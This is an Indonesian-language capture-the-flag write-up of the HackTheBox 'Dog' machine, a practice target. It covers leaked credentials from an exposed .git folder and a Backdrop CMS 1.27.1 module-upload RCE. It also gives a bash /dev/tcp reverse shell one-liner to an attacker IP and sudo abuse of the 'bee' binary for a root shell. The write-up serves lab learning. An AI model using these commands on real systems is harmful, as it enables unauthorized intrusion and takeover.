
Artikel ini membahas writeup HTB Dog, salah satu tantangan dari platform HackTheBox Dog dengan sistem operasi Linux dan tingkat kesulitan Easy. Pada Dog machine HackTheBox, kamu akan belajar eksploitasi CMS, pemanfaatan file .git, hingga privilege escalation berbasis binary.
Daftar Isi
- Informasi Umum Machine
- Enumeration
- Eksploitasi Backdrop CMS
- Privilege Escalation
- Root Flag
- Kesimpulan
Informasi Umum Machine
Nama: Dog
Platform: HackTheBox
OS: Linux
Tingkat Kesulitan: Easy
IP Target: 10.10.11.58
Machine ini berfokus pada eksploitasi web berbasis Backdrop CMS dan praktik umum keamanan seperti file .git yang terbuka dan konfigurasi sudo yang rentan.
Enumeration
Langkah pertama dalam writeup HTB Dog ini adalah melakukan enumerasi menggunakan nmap untuk memetakan port dan service yang berjalan. Tantangan ini cukup khas untuk dog machine HackTheBox karena pendekatannya yang web-centric.
nmap -sC -sV -oN dog-nmap.txt 10.10.11.58
Hasil menunjukkan port 80 terbuka dengan service HTTP. Saat membuka http://dog.htb, tampil halaman bertema anjing. Enumerasi direktori menggunakan dirsearch mengungkap direktori tersembunyi termasuk .git dan /files.
dirsearch -u http://dog.htb -e php,txt
Ditemukan folder .git yang bisa diunduh untuk memperoleh source code, dan /files mengungkap nama pengguna tiffany.
Eksploitasi Backdrop CMS
Setelah meng-clone isi folder .git, ditemukan file settings.php yang berisi password hash. Password ini digunakan untuk login ke Backdrop CMS sebagai user tiffany.
Langkah login:
- Buka
http://dog.htb - Username:
tiffany - Password: (dari settings.php)
Di dashboard admin CMS, diketahui bahwa versi yang digunakan adalah Backdrop CMS 1.27.1. Versi ini rentan terhadap RCE via upload module.
Langkah eksploitasi:
- Download exploit Backdrop CMS RCE 1.27.1
- Jalankan exploit:
python3 52021.py http://dog.htb - Upload file
shell.zipvia menu: Functionality β Install Module - Akses shell melalui:
http://dog.htb/modules/shel1/shel1.php
Kemudian setup listener di local:
nc -lvnp 4444
Jalankan reverse shell dari web shell:
bash -c 'bash -i >& /dev/tcp/10.10.14.149/4444 0>&1'
Alt text: tampilan shell interaktif setelah eksekusi exploit Backdrop CMS
Privilege Escalation
Setelah reverse shell didapat, enumerasi user mengungkap akun johnsucack. Gunakan password yang sama untuk su:
su johnsucack
Cek hak akses sudo:
sudo -l
Output menunjukkan: (ALL) NOPASSWD: /usr/local/bin/bee
Binary ini bisa dieksekusi sebagai root dengan parameter eval:
sudo /usr/local/bin/bee --root=/var/www/html eval "system('id');"
Untuk mendapatkan shell root:
sudo /usr/local/bin/bee --root=/var/www/html eval "system('/bin/bash -p');"
Alt text: terminal menunjukkan eksekusi shell root melalui binary bee
Root Flag
Setelah mendapat shell root, ambil flag:
cat /root/root.txt
Flag berhasil didapat π
Kesimpulan
HackTheBox Dog merupakan machine yang ideal untuk pemula karena mengajarkan pentingnya enumerasi, pemanfaatan kredensial dari file publik, dan analisis binary. Dengan menyelesaikan writeup HTB Dog ini, kamu telah menyelesaikan salah satu dog machine HackTheBox yang paling representatif untuk web-based attack vector.
- π Hindari expose folder
.gitdi production - π Jangan reuse password pada user berbeda
- π Waspadai binary custom dengan hak sudo
Machine ini sangat cocok untuk pemula yang ingin belajar keterkaitan antara web exploitation, credential reuse, dan privilege escalation.
Baca juga:
